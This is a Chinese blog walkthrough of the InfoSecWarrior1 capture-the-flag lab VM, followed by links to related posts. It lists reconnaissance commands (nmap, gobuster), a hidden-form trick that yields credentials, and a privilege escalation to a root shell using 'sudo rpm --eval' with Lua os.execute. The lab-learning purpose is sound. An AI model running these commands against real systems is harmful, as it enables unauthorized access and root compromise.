Vulhub InfoSecWarrior1

最新推荐文章于 2024-02-02 16:09:33 发布
最新推荐文章于 2024-02-02 16:09:33 发布
阅读量243 收藏
点赞数
分类专栏: VULHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/105796703
版权

知识点

rpm SUID提权

主机发现

netdiscover

在这里插入图片描述

端口扫描

nmap -A -T5 192.168.80.40

在这里插入图片描述

站点目录爆破

gobuster dir -u http://192.168.80.40 -w /usr/share/wordlists/dirb/big.txt -t50 -q

在这里插入图片描述

  • 信息收集
http://192.168.80.40/sitemap.xml

在这里插入图片描述

http://192.168.80.40/index.htnl

发现隐藏表单,删除hidden字段页面显示表单
在这里插入图片描述
在这里插入图片描述
输入任意数值,页面跳转,提示切换请求方法
在这里插入图片描述
更改表单为post方法

在这里插入图片描述

  • 获取密码
    在这里插入图片描述

提权

ssh isw0@192.168.80.40
  • SUID提权
sudo -l

在这里插入图片描述

sudo rpm --eval '%{lua:os.execute("/bin/sh")}'

在这里插入图片描述

END
在这里插入图片描述

hee_mee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机Infosec_Warrior1渗透
xingjinhao123的博客
03-07 377
靶机介绍 官方下载地址: http://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/ 靶机难度:容易 运行环境 靶机:网络设为NAT模式,IP地址:192.168.174.141 攻击机:同网段下的kali linux,IP地址:192.168.174.135 开始渗透: 运行靶机 获取靶机地址 扫描端口,只有两个端口22端口是ssh服务的80端口是apache2服务的 扫描目录 web首页是apache服务的 sitemap.xml
Vulnhub靶机】Infosec_Warrior1
过期的秋刀鱼
08-20 213
难易程度: Easy。
靶机渗透-InfoSecWarriorBox2
qq_43235703的博客
02-02 1190
靶机渗透-InfoSecWarriorBox2 信息收集 nmap开路 nmap -sS -p1-65535 192.168.1.102 dirb扫描 访问56563端口 初步判断网站是使用python来写的,我们可以使用nc来反弹到shell来执行内容 提示我们输入数字,那随意输入一个数字看看回显 输入了2,执行了ping命令,ping自己,ping的次数为我们输入的数字 试想后台执行的命令为: ping -c {} 127.0.0.1 Geshell 中括号里面为我们输入的数字次数,所以才会执行两次
Vulnhub系列靶机-Infosec_Warrior1
来日可期的博客
09-21 1041
获取了用户名和密码信息后,之前在端口扫描的时候探测出了22端口,尝试ssh连接。由于靶机是在Centos系统上,所以在输入框中输入ls,没有得到正常的回显。之前的表单是GET方式提交的,尝试将from表单替换成post请求方式。查看页面源代码,发现一个隐藏的form表单,让其显示出来。连接成功,但是当前用户的权限较低,进行提权。,有一张gif格式的动态图(蛮搞笑的)。,发现后端接受的数据就是POST方式。发现22端口和80端口是开发的。这样页面上就多了一个提交的输入框。查找rpm命令字的提权方式。
Vulhub-master
08-08
kali linux 下搭建 Vulhub 靶场(用于无法科学上网导致的下载失败)
vulhub靶场.zip
10-14
vulhub靶场
Centos7漏洞库vulhub-master.zip
03-01
1. **Web应用漏洞**:Vulhub中可能包括了如SQL注入、XSS跨站脚本、CSRF跨站请求伪造、文件包含漏洞等经典Web漏洞的复现。例如,你可以通过学习如何利用这些漏洞,理解它们的工作原理,从而提高你的安全防护能力。 2...
vulhub-master.zip
06-10
Vulhub是一个面向广大安全研究者和爱好者的开源项目,其主要目的是提供一系列的安全漏洞靶场环境。这个项目名为“vulhub-master.zip”的压缩包,包含了一个2020年6月10日更新的Vulhub完整版本。Vulhub的设计理念是...
SCI-HUB客户端(文献神器v6.0).zip
03-18
SCI-HUB客户端(文献神器v6.0) for windows,下载后安装即可,非常好用,欢迎下载。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
lua中执行系统命令
热门推荐
bosbear的专栏
02-21 4万+
Lua中, os.execute可以执行dos命令,但是返回的是系统状态码,默认输出 io.popen()也可以执行dos命令,但是返回一个文件。eg: local t = io.popen('svn help') local a = t:read("*all") --a返回一个字符串,内容是svn help的内容 如果想执行某命令或程序可选os.execute(),如果还想捕
收集的一些常用的VF命令
dingmao6790229的专栏
05-07 3247
1.工作中用到的一些:appe from ../sjshbzaprepl wttdbz with 1 allopen sjswt shareusebrowrepl wtzqdm with 000001 for wtywbz=0Cbrow for left(gfywlb,1) != Amodi修改DBF表结构 2.取得日期:repl ls wi
LUA用os.execute启动APK/关闭APK
MaWenDong
04-05 7873
==================== 1. 启动APK ==================== os.execute("am start -n {包(package)名} / {包名}.{活动(activity)名称}") 包名package和活动activity名称可以反编译apk后,在每个apk的AndroidManifest.xml里面查看。 例如: 启动计算器: os.
OSCP - JIS-CTF-VulnUpload-CTF01 的破解
kevinhanser
04-13 3585
本文主要记录对 JIS-CTF-VulnUpload-CTF01 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:JIS-CTF-VulnUpload-CTF01 VM - JIS-CTF-VulnUpload-CTF01 的破解 2019年4月13日19:19:03 【原创】 1. 官方描述 VM Name: ...
MRCTF 2020-“TiKi小组”
pone2233的博客
03-29 2512
文章目录题目状态:赛事信息Web:ez_bypass | SOLVED|你传你????呢 | SOLVED|PYwebsite | SOLVED|套娃 | SOLVED|Reverse:无Pwn:无Misc:Hello_Misc | OPEN |你能看懂音符吗 | SOLVED |CyberPunk | SOLVED |ezmisc | SOLVED |pyFlag | OPEN |Unravel!! ...
财务报表,项目费用支出明细.xlsx
最新发布
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
vulhub靶场搭建
07-27
1. 首先,确保你已经安装了 Docker 和 Docker Compose。如果没有安装,请根据操作系统的要求进行安装。 2. 下载 Vulhub 项目的代码。你可以在 Vulhub 的 GitHub 仓库上找到它:https://github.com/vulhub/vulhub 3...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值